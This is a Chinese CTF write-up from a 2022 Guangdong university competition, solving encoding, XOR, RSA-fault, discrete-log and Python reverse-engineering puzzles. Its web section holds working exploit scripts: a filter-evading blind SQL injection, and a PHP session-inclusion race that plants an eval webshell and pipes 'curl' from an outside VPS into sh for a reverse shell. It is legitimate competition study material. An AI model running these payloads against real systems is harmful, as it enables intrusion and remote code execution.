2022广东大学生攻防大赛WP

MISC

复合

尝试导出http数据

发现文件类型和文件名都被改过

image-20240429145608363

把pass.md改为pass.zip,发现打不开

添加文件头

image-20240429145938762

解压得到

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
Emklyusg=E2=80=82gni=E2=80=82bvvymlag=E2=80=82tsqic=E2=80=82colz=E2=80=82jx=
moxvl=E2=80=82tiwhz=E2=80=82ebmee,=E2=80=82Zhjeoig=E2=80=82Krpvpi-Zgvlyvx=
=E2=80=82Evdr=E2=80=82or=E2=80=82olv=E2=80=82Rbtm=E2=80=82bl=E2=80=82Gcscck=
h=E2=80=82une=E2=80=82fz=E2=80=82e=E2=80=82tftstrtkdrx=E2=80=82rxeb=E2=80=
=82suv=E2=80=82olfqx=E2=80=82dpb=E2=80=82tizh=E2=80=82km=E2=80=82kliq=E2=80=
=82ox=E2=80=82hsjr:=E2=80=82mom=E2=80=82luyik,=E2=80=82kfx=E2=80=82dwhrh-wi=
=E2=80=82iympwagp,=E2=80=82vru=E2=80=82ral=E2=80=82qzveomvlm.=E2=80=82Aw=E2=
=80=82fgc=E2=80=82olrr=E2=80=82fhvl=E2=80=82nivpkf=E2=80=82vhzr=E2=80=82vvj=
jvqlpwagpn=E2=80=82jrje=E2=80=82pvgu=E2=80=82xcijc=E2=80=82vhbrmsmmvq=E2=80=
=82bz=E2=80=82vbz=E2=80=82xj=E2=80=82jrsea=E2=80=82bukq=E2=80=82wyk=E2=80=
=82kxymye=E2=80=82xj=E2=80=82hvqvyqok=E2=80=82xcid.=E2=80=82Uav=E2=80=82jro=
rb=E2=80=82cfsgn=E2=80=82knt=E2=80=82oisn=E2=80=82uahb=E2=80=82vz=E2=80=82m=
n=E2=80=82pzix=E2=80=82aw=E2=80=82ok=E2=80=82sgh?=E2=80=82Nfh=E2=80=82aznor=
zh=E2=80=82zl=E2=80=82plagkvi=E2=80=82wtgxubvlmx=E2=80=82qvbbjqak=E2=80=82h=
vvvq=E2=80=82gvb=E2=80=82gxc=E2=80=82os=E2=80=82sc=E2=80=82khbvurvp?=E2=80=
=82Wjtn=E2=80=82qf=E2=80=82rmai=E2=80=82zq=E2=80=82yhvggwomt.Ygk=E2=80=82eu=
u=E2=80=82gvyxfm=E2=80=82bx=E2=80=82vt=E2=80=82xci=E2=80=82kylr-weoiixvb=E2=
=80=82btxrxeommc=E2=80=82hm=E2=80=82kbtxzqgmkhzl=E2=80=82siymtggl=E2=80=82k=
nt=E2=80=82xmycw=E2=80=82vsivs=E2=80=82xci=E2=80=82mgkacr=E2=80=82uj=E2=80=
=82kekgxukr?=E2=80=82Kzzr=E2=80=82scyvzr=E2=80=82seiexcw-jiek=E2=80=82mimkg=
taqikw=E2=80=82ns=E2=80=82xpxhbye=E2=80=82migictzmq=E2=80=82zlz=E2=80=82tic=
lzcek,=E2=80=82tccjgvpiay=E2=80=82azvv=E2=80=82dttwhypt=E2=80=82xzkx-kzvbii=
,=E2=80=82xiybumq=E2=80=82zs=E2=80=82nivi=E2=80=82xmnvimzrtw=E2=80=82bu=E2=
=80=82iyr=E2=80=82xcmeel,=E2=80=82jiek=E2=80=82sa=E2=80=82trrblvgy=E2=80=82=
tmsdgglvgrc=E2=80=82vqflz=E2=80=82aprs.=E2=80=82Xj=E2=80=82wlaa=E2=80=82wme=
ysiw,=E2=80=82kfx=E2=80=82apbakcx=E2=80=82fd=E2=80=82kliqorb=E2=80=82e=E2=
=80=82emolt=E2=80=82zgc=E2=80=82nivk=E2=80=82t=E2=80=82wzblpdkrrx=E2=80=82d=
ifzi=E2=80=82jj=E2=80=82kgfl.=E2=80=82Eue=E2=80=82wkieb=E2=80=82avcey=E2=80=
=82vzeuggn=E2=80=82iouyo=E2=80=82ayym=E2=80=82umikv=E2=80=82cegnxumq?=E2=80=
=82Zldw=E2=80=82hsxzbvur=E2=80=82cej=E2=80=82zxlv=E2=80=82rrslyvlmsg=E2=80=
=82ntwriicw=E2=80=82vdrx=E2=80=82xci=E2=80=82pctya=E2=80=82oe=E2=80=82xcsjc=
=E2=80=82pow=E2=80=82hyi=E2=80=82gmkckhbhxi=E2=80=82dr=E2=80=82dcwpknr=E2=
=80=82iyytympwa.=E2=80=82

根据特征发现是quoted-printable编码

1
Emklyusg gni bvvymlag tsqic colz jxmoxvl tiwhz ebmee, Zhjeoig Krpvpi-Zgvlyvx Evdr or olv Rbtm bl Gcscckh une fz e tftstrtkdrx rxeb suv olfqx dpb tizh km kliq ox hsjr: mom luyik, kfx dwhrh-wi iympwagp, vru ral qzveomvlm. Aw fgc olrr fhvl nivpkf vhzr vvjjvqlpwagpn jrje pvgu xcijc vhbrmsmmvq bz vbz xj jrsea bukq wyk kxymye xj hvqvyqok xcid. Uav jrorb cfsgn knt oisn uahb vz mn pzix aw ok sgh? Nfh aznorzh zl plagkvi wtgxubvlmx qvbbjqak hvvvq gvb gxc os sc khbvurvp? Wjtn qf rmai zq yhvggwomt.Ygk euu gvyxfm bx vt xci kylr-weoiixvb btxrxeommc hm kbtxzqgmkhzl siymtggl knt xmycw vsivs xci mgkacr uj kekgxukr? Kzzr scyvzr seiexcw-jiek mimkgtaqikw ns xpxhbye migictzmq zlz ticlzcek, tccjgvpiay azvv dttwhypt xzkx-kzvbii, xiybumq zs nivi xmnvimzrtw bu iyr xcmeel, jiek sa trrblvgy tmsdgglvgrc vqflz aprs. Xj wlaa wmeysiw, kfx apbakcx fd kliqorb e emolt zgc nivk t wzblpdkrrx difzi jj kgfl. Eue wkieb avcey vzeuggn iouyo ayym umikv cegnxumq? Zldw hsxzbvur cej zxlv rrslyvlmsg ntwriicw vdrx xci pctya oe xcsjc pow hyi gmkckhbhxi dr dcwpknr iyytympwa. 

把flagggggg.exe改为.doc

image-20240429145753023

FLAG.png则是everything 的安装包

获得一个key:everything

维吉尼亚解密

1
Arguably the greatest novel ever written about aging, Gabriel Garcia-Marquez Love in the Time of Cholera may be a challenging text for those who need to read it most: the young, the would-be rational, and the impatient. To say that many health care professionals fall into these categories is not to fault them but merely to describe them. Who being young can know what it is like to be old? Who trained in western scientific medicine dares not try to be rational? Flag is life is fantastic.And who caught up in the task-oriented imperative of contemporary medicine can truly claim the virtue of patience? Even before managed-care initiatives so greatly increased the pressure, physicians were famously time-driven, trained to seek efficiency in all things, care of patients prominently among them. To such persons, the thought of reading a novel may seem a profligate waste of time. Why spend hours reading about what never happened? This question has been eloquently answered over the years by those who use literature in medical education.

Flag is life is fantastic

flag{life_is_fantastic}

EasySteg

flag

image-20240502123715779

reverse一下

hide

然后不知道怎么写了,有没有大神

CRYPTO

crypto-xor2

”轮环异或加密,你能解开么?格式:flag{}“

文件下载有一个py文件和一个文本文件

从描述可得知就是一个异或加密

1
2
3
4
5
6
7
8
9
10
from secret import flag

key = "xxxx" # not real key

cipher = ""
for i, c in enumerate(flag):
    cipher += chr(ord(c) ^ ord(key[i%4]))

with open("cipher", "w") as f:
    f.write(cipher)

image-20240429142257505

先把cipher乱码打印出来,再比葫芦画瓢异或就行

1
2
3
4
5
6
7
8
9
10
11
12
13
key = "xxxx"
f = open("cipher", "rb")
for i in f:
    print(i)
    #b'\x1e\x14\x19\x1f\x03\x1e\x1b\x1b\x1aHNNMU\x1a\x1b\x1dMU\x1cKJAU\x19\x1b\x19OUAAIOA\x1a\x1c\x1bA\x1d\x1cK\x05'

flag = b'\x1e\x14\x19\x1f\x03\x1e\x1b\x1b\x1aHNNMU\x1a\x1b\x1dMU\x1cKJAU\x19\x1b\x19OUAAIOA\x1a\x1c\x1bA\x1d\x1cK\x05'
cipher = ""
for i, c in enumerate(flag):
    cipher += chr(c ^ ord(key[i % 4]))
print(cipher)
#flag{fccb0665-bce5-d329-aca7-99179bdc9ed3}

RSA Fault

题目基于RSA的CRT解密故障,正常流程下,RSA的CRT解密流程是:

  • 计算mp = c^dp % p
  • 计算mq = c^dq % q
  • CRT组合得到模n下的明文m

而在这一题目中也是按照这个流程进行解密的,只是解密时出现了一点故障,如下:

1
2
3
4
5
6
def fault_signature(m,dp,p):
    bits = list(range(dp.bit_length()))
    # Random Errors
    for i in range(2):
        dp ^= 1 << bits.pop(randbelow(len(bits)))
    return pow(m,dp,p)

也就是说,在计算mp、mq时,dp、dq都发生了两比特的随机翻转,这会导致什么后果呢?我们以dp做例子看一看错误结果与正确结果的关系是什么,假设发生故障后,dp的第i比特位由1变成0,第j比特位由0变成1,则有:

那么计算明文时,原本正确的mp应该是:

𝑚𝑝=𝑐𝑑𝑝(𝑚𝑜𝑑  𝑝)m**p=cdp(mod**p)

而发生了故障后变为:

𝑚𝑝′=𝑐𝑑𝑝′=𝑐𝑑𝑝−2𝑖+2𝑗(𝑚𝑜𝑑  𝑝)m**p′=cdp′=cdp−2i+2j(mod**p)

也就是:

𝑚𝑝′=𝑚𝑝𝑐−2𝑖+2𝑗(𝑚𝑜𝑑  𝑝)m**p′=mpc−2i+2j(mod**p)

这就是正确值和错误值的关系所在,那么怎么利用呢?我们观察他的CRT组合过程:

1
2
3
4
5
def fast_sign(p,q,m,d):
    Sp=fault_signature(m,d%(p-1),p)
    Sq=fault_signature(m,d%(q-1),q)
    q_inv_p=inverse(q,p)
    return Sq+((Sp-Sq)*q_inv_p%p)*q

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
from Crypto.Util.number import *
from tqdm import *
from gmpy2 import powmod

n=574370586922196377355321224190746373039960224108385243176501127428241048239267855106791452531127716395867009150959315133488286007016233693579335880694651355103104937242790643593308890788070770218317565926178413379641001140239463599845984585594216005669250735996427555432706918692021991171275999765908594644925310142503285857206438695393554469523893825536665449736024054747514990216868678037268511584416901858031484008394871632441625217801474466940448366132590034239161293582715621533020233700914500451000518789317508997706548731775994224900635411275356861073588492237057246039324320408280417962081059669609944892848853780428862986621290797973749713412083663630592820568996851852624888672199864050563167321198235872086549523724070759241183192416218511190119068501395848056263721692763920519420483450363920749842894919641617223824549955451175853298676915196907992214900910995739550922989640910170960485331090144764984190331659966983894284549074935918333832010695306946738396909292095557434605170122130253447970074530010535669698871315126545879037607033278200101983233974781109773521793185318497615158089955239305362817170200396186939592803861438759399366317967907276433739944705398688186125687434884160720331949648831768235019520753051
c=362746477666691362768020792694001662947338474716913368693174463002520197020564066827257658031973928782798475691408938544507860754837561076547768524746177804704585961840013195670850383664598530250844247051357401431355747035161872296498272254812117528152035029837329888665483050219346048506686826529658339084796751613191344103470399897412327265769031997892130002446603232458409236206943209821169103651387451247194645094911282908657256087747570185214886614187576679719039472798093505360214315789098466937327166004179112376884521755838649234980317596136131856395020357496102439866802500120832803908679095031213229175799928906606183829594039803465175754892790016569054202014492252632598390521485126555541028488750683218149923230255353856768460065582373942152212466578732981079533510158716511814895961705462125751613632997737277288382147402327477915047046907933387151859100428914053565582939275934201969543786806286829008145312080251388532179582069076383305307261868697565579486745927759554919760999971562169014832448067746716988944857402974596263631030324458073601261131647030891982010744785938573077302132228457909917393551651580730603193283673617373961392738841147569262489888662190518624689563339261875140574320207133638608459439737908
e=65537
m_=181132170825291068274428850998643597061484670852441092778734815200952945165798640567559048182854905384108012241001865806757291292964878403693878633267090257939702439086938795033128278779133834594418004509584542651057754389391530368493133213945631248904554493258521520798694334742694993906802448945319763766711250429667767598356479263059390167552213786607866923685142648716071350485727194734337940552363833868066952302121733855882534848604214379852034329599650298994536987432597047148545264456233041626319601655687038246563924371156826280023920057214856878486989521822479101902273314188727929753114744387793613654594486456078456745565816416446216301510436912147365878585967444947975888852483708054850555285865986707367641310078228756765470506112047816213856326341605584860221570211438661212837691148838965467195299751453604986777239749470579607668379117939736929002608940866262332919423512927188694030664492052057406513313547841154542784730283602499247284074861014689921502985853652524070575242018309321538365113665998744193304726118797289396908257027371761721071940141406755037691084908985405935268861122559095563199460082893754126987724947094729974089127671509635467188911500940561377499209529543406027692937688249517323189766222196


if(0):
    temp = pow(m_,e,n)*inverse(c,n) % n
    is_positive = [(1,1),(1,-1),(-1,1),(-1,-1)]
    for i in trange(1,2**9):
        for j in range(1,2**9):
            for k in is_positive:
                pow1 = k[0] * (1 << i)
                pow2 = k[1] * (1 << j)

                powpow = e*(pow1+pow2)
                temp1 = powmod(c,powpow,n)
                if(GCD(temp-temp1,n) != 1):
                    print(GCD(temp-temp1,n))
                    exit()

p = 22729650064982784569842293886112765216527000770423090114368848726216608009470242046289112001066994207864986803275467348289746127450153723652496430471357120041795298501429299577023455880461653074271752126909063527106805373676824002441432786073264913608717964699805549233067291369590239167126966358735428766668880762276154481715084785307608648063807156963867353713246912838175911702373808989338864178007028831198106910117378309595596445705841624769259901086135441435201197082487810720560245568126972348046187117147996691190165006379956721543713979012391623875001928207563847027939516349080119621035628223197354404395029
q = n // p
phi = (p-1)*(q-1)
d = inverse(e,phi)
print(long_to_bytes(pow(c,d,n)))

flag{r$a_fault_w1th_C5T_m3thod_01a7da73}

EzLog

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
from Crypto.Util.number import *

p = 100380180012669637378744942171261398091918624065560475592116442008723831000724625143134783707140522784290998397673597179788440926203643287774297527809892664834392514365222771089497090006645985087685142898313371176199974996077656302299931624478967894041880873282005346940525877863969908284953093553124147377177
g = 5
y = 96684738736980459903034929785324785968796025930893469779531286222406396988966715592949333235326832011076688325476630562163362584667393368651336925308324274452289994386658111183814813840211779123227496106401048680166365937882835154692663834966767665274167877263256747696012785293060701554746392300871850636481
factors = [3^2,56989,60217,538687139,560945999,571334087,610502371,631183649,632950873,635821279,650856469,655219333,656624429,681519161,718737731,731233123,733484177,763003931,789196883,819494821,819518603,844402217,857626969,895870279,907446997,908829937,950563309,972564941,1030070381,1048221233,1063554559]
phi = prod(factors)
h = (p-1) // phi

#part1 use Pohlig-hellman to get first-step m0(use sage)
m0 = discrete_log(Mod(pow(y,h,p),p),Mod(pow(g,h,p),p),ord = phi)


#part2 guess the suffix is "}."" and padlen is 13
padlen = 13
suffix = bytes_to_long(b"}." + long_to_bytes(padlen)*padlen)
length = padlen + 2
m1 = (m0-suffix)*inverse(256^length,phi) % phi


#part3 bsgs(use sage)
y1 = y * pow(g,-(256^length*m1+suffix),p) % p
g1 = pow(g,256^length*phi,p)
k = discrete_log(Mod(y1,p),Mod(g1,p),ord = p-1,bounds = (0,2^(1024-860-length*8)))


#part4 get flag
flag = 256^length*(k*phi+m1)+suffix
print(long_to_bytes(flag))

#b'You are a master of the dlp algos! Here is your flag: flag{S0_Smooth_ord3r_pr1me_dlp!_pohlig_hellman_with_padding}.\r\r\r\r\r\r\r\r\r\r\r\r\r'

flag{S0_Smooth_ord3r_pr1me_dlp!_pohlig_hellman_with_padding}

REVERSE

pyre

这种exe文件怎么调用py的库?要怎么逆呢,小茗同学,你来试试吧?

安装uncompyle6

1
pip install uncompyle6
1
uncompyle6 Origin.pyc

得到源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
def check():
    a = input("plz input your flag:")
    c = [144, 163, 158, 177, 121, 39, 58, 58, 91, 111, 25, 158, 72, 53, 152,
     78, 171, 12, 53, 105, 45, 12, 12, 53, 12, 171, 111, 91, 53,
     152, 105, 45, 152, 144, 39, 171, 45, 91, 78, 45, 158, 8]
    if len(a) != 42:
        print("wrong length")
        return 0
    b = 179
    for i in range(len(a)):
        if ord(a[i]) * 33 % b != c[i]:
            print("wrong")
            return

    print("win")


check()

编写爆破函数

1
2
3
4
5
6
7
8
9
def crack():
    c = [144, 163, 158, 177, 121, 39, 58, 58, 91, 111, 25, 158, 72, 53, 152, 78, 171, 12, 53, 105, 45, 12, 12, 53, 12, 171, 111, 91, 53, 152, 105, 45, 152, 144, 39, 171, 45, 91, 78, 45, 158, 8]
    b = 179
    for enc in c:
        for i in range(32,127):
            if 33 * i % b == enc:
                print(chr(i),end='')
                break
crack()

flag{2889e7a3-0d6b-4cbb-b6e9-04c0f26c9dca}

WEB

一下是贴别人WP

Web | easy_ctf (141pt)

把内容拿出来,然后统计一下,再排个序,最后提交一下就行了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
import requests
import re

RE = re.compile(r'^([a-zA-Z0-9]*)<td>', re.MULTILINE)

def f(r):
    p = {}
    for c in r:
        if c in p:
            p[c] += 1
        else:
            p[c] = 1
    a = [ (v, k) for (k, v) in p.items() ]
    a = sorted(a)
    return ''.join([ c[1] for c in a ])

s = requests.Session()
r = s.get('http://120.79.191.238:42399')

while True:
    print(r.text)
    m = re.search(RE, r.text)
    a = m.group(1)
    a = f(a)

    r = s.post('http://120.79.191.238:42399', data={'ans': a})

Web | easysql (833pt)

经测试和观察,不难发现广告名是是有注入点的,可以用 '||{sql}||' 的方式注入。然后广告提交之后,可以查看详情,通过观察这条广告是否正常显示,就可以知道 {sql} 的条件是否为真。所以可以用盲注。

并且可以发现,广告名是有关键词过滤的,包括 in, or, and, union, password 等,其中 andor 可以用 &&|| 绕过。

然后由于屏蔽了 inor 导致没有办法通过 information_schemamysql.innodb_table_stats 查询表名和列名,且 MariaDB 没有 sys 库。

故使用伟大的盲猜方法(指猜了好几个小时),猜出里面有一个 ads 表,里面有 22 列;一个 users 表,有 id, name 和感觉有的 password 三列(但是并没有什么卵用,因为 admin 帐号啥都没有)。

然后又使用盲猜大法(admin的md5搜到了极其相似的题目,考虑可能有flag字段/表/库),找到了一个 flag 表,然后在未知列名的情况下,用 SELECT (SELECT * FROM flag) >= (SELECT 1, {string}) 来盲注,就可以拿到一个没有区分大小写的 flag。

小小爆破了一下flag,因为太菜了没不到大小写敏感的注入查询方法(过滤了bINary,MariaDB还没有json)
然后又 xjb 枚举,发现 flag 只有 sql 的首位大写,即 flag{Sql_1nj3cti0n_1s_s0_easy},提交可过。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
import requests
import re

cookies = {'PHPSESSID': '_______________'}
RE = re.compile(r'detail\.php\?id=(\d+)')

def clear_list():
    requests.get('http://120.79.141.85:47930/empty.php', cookies=cookies)

def add_ads(title):
    global aid
    payload = {'title': title, 'content': 'Elaina is best', 'ac': 'add'}
    r = requests.post('http://120.79.141.85:47930/addads.php', cookies=cookies, data=payload)
    aid += 1
    assert '已发送申请' in r.text, title

def check_sql(sql):
    global aid
    if aid % 10 == 0:
        clear_list()
        add_ads('1')
    sql = sql.replace(' ', '/**/')
    add_ads(f"'||{sql}||'")
    requests.get(f'http://120.79.141.85:47930/index.php', cookies=cookies)
    r = requests.get(f'http://120.79.141.85:47930/detail.php', params={'id': str(aid)}, cookies=cookies)
    return '待管理确认' in r.text

class CharBinarySearch:
    def __init__(self):
        self.l = 0
        self.r = 128

    def is_done(self):
        return self.l + 1 >= self.r

    def middle(self):
        return (self.l + self.r) // 2

    def update(self, r):
        if r:
            self.l = self.middle()
        else:
            self.r = self.middle()

def main():
    global aid
    aid = 0

    clear_list()
    add_ads('1')
    r = requests.post('http://120.79.141.85:47930/index.php', cookies=cookies)
    aid = int(re.search(RE, r.text).group(1))
    print(f'Initial ID: {aid}')

    # # 可爆破出列数
    # for i in range(1, 64):
    #     s = ','.join(["''"] * i)
    #     r = check_sql(f"(SELECT (SELECT {s})<(SELECT * FROM flag LIMIT 1))=true")
    #     print(i, r)

    content = ''
    for i in range(len(content) + 1, 128):
        s = CharBinarySearch()
        while not s.is_done():
            # r = check_sql(f"(SELECT HEX(SUBSTR(database(),{i},1))>=HEX({s.middle()}))")

            p = content + chr(s.middle())
            p = hex(int.from_bytes(p.encode(), 'big'))
            r = check_sql(f"(SELECT (SELECT * FROM flag) >= (SELECT 1, {p})) = 1")
            # r = check_sql(f"((SELECT HEX(SUBSTR(name,{i},1)) FROM users LIMIT 1 OFFSET 0)>=HEX({s.middle()}))")

            print(f'{i} {s.middle()} => {r}')
            s.update(r)
        content += chr(s.l)
        print(content)

if __name__ == '__main__':
    main()

Web | in (138pt)

随便点点,发现http://119.23.247.96:45837/action.php?file=2.txt 可以读文件,尝试包含action.php自身,发现卡顿且无返回,说明包含方式很可能是include
先看一眼服务器是apache,不能包含日志拿shell,于是考虑看看PHP的源码
伪协议读到源码http://119.23.247.96:45837/action.php?file=php://filter/convert.base64-encode/resource=action.php
开头看到session_start()大概率是session包含,偷懒直接用session竞争的板子拿shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
import io
import requests
import threading

sessid = 'TGAO'
data = {"cmd": "system('curl 106.52.237.196 | sh');"}


def write(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        resp = session.post('http://119.23.247.96:45837/action.php',
                            data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST["cmd"]);?>'},
                            files={'file': ('tgao.txt', f)}, cookies={'PHPSESSID': sessid})


def read(session):
    while True:
        resp = session.post('http://119.23.247.96:45837/action.php?file=/tmp/sess_' + sessid, data=data)
        if 'tgao.txt' in resp.text:
            print(resp.text)
            event.clear()


if __name__ == "__main__":
    event = threading.Event()
    with requests.session() as session:
        for i in range(1, 30):
            threading.Thread(target=write, args=(session,)).start()
        for i in range(1, 30):
            threading.Thread(target=read, args=(session,)).start()
    event.set()

运行后立刻在vps上成功收到了反弹的shell(应该不用这么暴力也能解)

法二:
读取action.php的源码http://119.23.247.96:47473/action.php?file=php://filter/convert.base64-encode/resource=action.php

1
2
3
4
5
6
7
8
9
<?php
session_start();
error_reporting(0);
$name = $_POST['name'];
if($name){
    $_SESSION["username"] = $name;
}
include($_GET['file']);
?>

可以看到是session文件包含,目录为/tmp/sess_PHPSESSID,写入webshell即可,先ls /获取到flag文件名在读取

image-20240505005630813